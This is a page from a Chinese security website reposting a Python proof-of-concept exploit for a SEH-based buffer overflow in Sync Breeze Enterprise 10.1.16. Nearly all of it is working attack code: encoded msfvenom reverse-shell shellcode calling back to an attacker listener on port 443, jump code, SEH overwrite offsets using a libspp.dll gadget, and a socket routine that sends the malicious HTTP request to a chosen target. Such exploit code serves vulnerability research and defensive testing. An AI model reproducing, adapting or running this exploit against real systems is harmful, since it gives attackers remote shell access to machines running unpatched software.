首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sync Breeze Enterprise 10.1.16 SEH Overflow
来源:vfocus.net 作者:wetw0rk 发布时间:2017-10-13  
#!/usr/bin/env python
#
# Exploit Title	  : Sync Breeze Enterprise v10.1.16 0day
# Date            : 10/11/2017
# Vendor HomePage : http://www.syncbreeze.com
# Exploit Author  : Milton Valencia (wetw0rk)
# Software        : http://www.syncbreeze.com/downloads.html
# Version	  : 10.1.16
# Tested on	  : Windows 7 (x86)
#
# Description	  : Sync Breeze Enterprise 10.1.16 suffers from a SEH based
#		    vulnerability. Successful exploitation results in remote
#		    access.
#
# Special Greetz  : Corelan, Offsec, Abatchy (top llama), Seamus, N4ss4r
#	Ryan, Miguel (best boss..), everyone at https://netsecfocus.slack.com/
#

import sys, socket, struct

try:
	host = sys.argv[1]
	port = int(sys.argv[2])

except IndexError:

	print "Usage: %s <target> <port>" % sys.argv[0]
	print "Example: %s 192.168.0.16 80" % sys.argv[0]
	sys.exit(0)

print "[->] Attacking %s:%d get that handler up" % (host,port)

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.16 LPORT=443
# -e x86/alpha_upper -b "\x00\x0a\x0d" -f c
shellcode = (
"\x89\xe3\xda\xdf\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4c\x42\x33\x30"
"\x35\x50\x53\x30\x33\x50\x4b\x39\x4a\x45\x46\x51\x39\x50\x35"
"\x34\x4c\x4b\x30\x50\x46\x50\x4c\x4b\x46\x32\x44\x4c\x4c\x4b"
"\x36\x32\x42\x34\x4c\x4b\x53\x42\x46\x48\x54\x4f\x4e\x57\x30"
"\x4a\x56\x46\x56\x51\x4b\x4f\x4e\x4c\x37\x4c\x55\x31\x43\x4c"
"\x34\x42\x36\x4c\x47\x50\x59\x51\x58\x4f\x44\x4d\x43\x31\x38"
"\x47\x4d\x32\x5a\x52\x50\x52\x46\x37\x4c\x4b\x30\x52\x42\x30"
"\x4c\x4b\x31\x5a\x37\x4c\x4c\x4b\x50\x4c\x54\x51\x54\x38\x4b"
"\x53\x30\x48\x55\x51\x38\x51\x50\x51\x4c\x4b\x51\x49\x37\x50"
"\x35\x51\x59\x43\x4c\x4b\x50\x49\x54\x58\x4b\x53\x57\x4a\x30"
"\x49\x4c\x4b\x46\x54\x4c\x4b\x53\x31\x59\x46\x50\x31\x4b\x4f"
"\x4e\x4c\x59\x51\x48\x4f\x34\x4d\x45\x51\x38\x47\x57\x48\x4b"
"\x50\x53\x45\x5a\x56\x43\x33\x53\x4d\x4c\x38\x47\x4b\x43\x4d"
"\x46\x44\x53\x45\x4a\x44\x36\x38\x4c\x4b\x31\x48\x46\x44\x35"
"\x51\x4e\x33\x52\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x50\x58"
"\x45\x4c\x33\x31\x48\x53\x4c\x4b\x44\x44\x4c\x4b\x43\x31\x58"
"\x50\x4c\x49\x50\x44\x36\x44\x36\x44\x51\x4b\x51\x4b\x35\x31"
"\x31\x49\x31\x4a\x36\x31\x4b\x4f\x4d\x30\x31\x4f\x51\x4f\x31"
"\x4a\x4c\x4b\x55\x42\x5a\x4b\x4c\x4d\x31\x4d\x32\x48\x46\x53"
"\x50\x32\x53\x30\x35\x50\x33\x58\x34\x37\x34\x33\x30\x32\x31"
"\x4f\x56\x34\x53\x58\x50\x4c\x33\x47\x46\x46\x45\x57\x4b\x4f"
"\x39\x45\x38\x38\x5a\x30\x35\x51\x45\x50\x35\x50\x36\x49\x49"
"\x54\x46\x34\x46\x30\x35\x38\x37\x59\x4d\x50\x42\x4b\x33\x30"
"\x4b\x4f\x59\x45\x56\x30\x56\x30\x30\x50\x36\x30\x47\x30\x36"
"\x30\x57\x30\x46\x30\x42\x48\x5a\x4a\x44\x4f\x39\x4f\x4d\x30"
"\x4b\x4f\x4e\x35\x5a\x37\x43\x5a\x44\x45\x32\x48\x39\x50\x4f"
"\x58\x45\x50\x42\x30\x32\x48\x43\x32\x43\x30\x45\x51\x4f\x4b"
"\x4d\x59\x4a\x46\x43\x5a\x32\x30\x31\x46\x51\x47\x43\x58\x4d"
"\x49\x4e\x45\x54\x34\x33\x51\x4b\x4f\x48\x55\x4d\x55\x49\x50"
"\x54\x34\x34\x4c\x4b\x4f\x50\x4e\x55\x58\x43\x45\x4a\x4c\x33"
"\x58\x4c\x30\x38\x35\x4e\x42\x31\x46\x4b\x4f\x49\x45\x43\x58"
"\x55\x33\x52\x4d\x33\x54\x35\x50\x4d\x59\x5a\x43\x46\x37\x30"
"\x57\x51\x47\x50\x31\x5a\x56\x32\x4a\x52\x32\x51\x49\x36\x36"
"\x4d\x32\x4b\x4d\x52\x46\x4f\x37\x51\x54\x31\x34\x37\x4c\x33"
"\x31\x55\x51\x4c\x4d\x50\x44\x31\x34\x42\x30\x58\x46\x33\x30"
"\x47\x34\x31\x44\x46\x30\x31\x46\x56\x36\x46\x36\x51\x56\x46"
"\x36\x50\x4e\x50\x56\x56\x36\x31\x43\x30\x56\x53\x58\x32\x59"
"\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x4e\x35\x4c\x49\x4b\x50\x30"
"\x4e\x46\x36\x50\x46\x4b\x4f\x36\x50\x42\x48\x53\x38\x4b\x37"
"\x35\x4d\x45\x30\x4b\x4f\x59\x45\x4f\x4b\x4c\x30\x38\x35\x4f"
"\x52\x56\x36\x33\x58\x4f\x56\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
"\x48\x55\x57\x4c\x34\x46\x33\x4c\x34\x4a\x4d\x50\x4b\x4b\x4d"
"\x30\x44\x35\x33\x35\x4f\x4b\x51\x57\x34\x53\x42\x52\x42\x4f"
"\x53\x5a\x35\x50\x46\x33\x4b\x4f\x48\x55\x41\x41"
)

# objdump2shellcode -d shellcode -f python -c -v jumpcode
jumpcode = ""
jumpcode += "\x25\x4a\x4d\x4e\x55"      # and    eax,0x554e4d4a
jumpcode += "\x25\x35\x32\x31\x2a"      # and    eax,0x2a313235
jumpcode += "\x2d\x37\x37\x37\x37"      # sub    eax,0x37373737
jumpcode += "\x2d\x74\x74\x74\x74"      # sub    eax,0x74747474
jumpcode += "\x2d\x55\x54\x55\x70"      # sub    eax,0x70555455
jumpcode += "\x50"                      # push   eax
jumpcode += "\x25\x4a\x4d\x4e\x55"      # and    eax,0x554e4d4a
jumpcode += "\x25\x35\x32\x31\x2a"      # and    eax,0x2a313235
jumpcode += "\x2d\x2d\x76\x7a\x63"      # sub    eax,0x637a762d
jumpcode += "\x2d\x2d\x76\x7a\x30"      # sub    eax,0x307a762d
jumpcode += "\x2d\x25\x50\x7a\x30"      # sub    eax,0x307a5025
jumpcode += "\x50"                      # push   eax
jumpcode += "\xff\xe4"                  # jmp    esp

offset	= "A" * (2495-len(shellcode))	# offset to nSEH
nSEH	= "\x74\x06\x75\x06"		# JE/JNZ -> jumpcode
SEH	= struct.pack('<L', 0x1001C65C)	# POP,POP,RET (libspp.dll)
trigger = "D" * (9067 - len(
	jumpcode  +
	offset    +
	nSEH      +
	SEH
	)
)

buffer = shellcode + offset + nSEH + SEH + jumpcode + trigger

vulnREQ = "GET /%s HTTP/1.1\r\n\r\n" % (buffer)
print "[->] sending poisonous bamboo"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
sock.send(vulnREQ)

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ASX to MP3 3.1.3.7 - '.m3u' Bu
·Tomcat JSP Upload Bypass Remot
·VX Search Enterprise 10.1.12 -
·Windows Escalate UAC Protectio
·Trend Micro InterScan Messagin
·Sync Breeze Enterprise 10.1.16
·ASX To MP3 Converter Stack Ove
·Opentext Documentum Content Se
·Trend Micro OfficeScan Remote
·Opentext Documentum Content Se
·IBM Notes 8.5.x/9.0.x - Denial
·Opentext Documentum Content Se
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved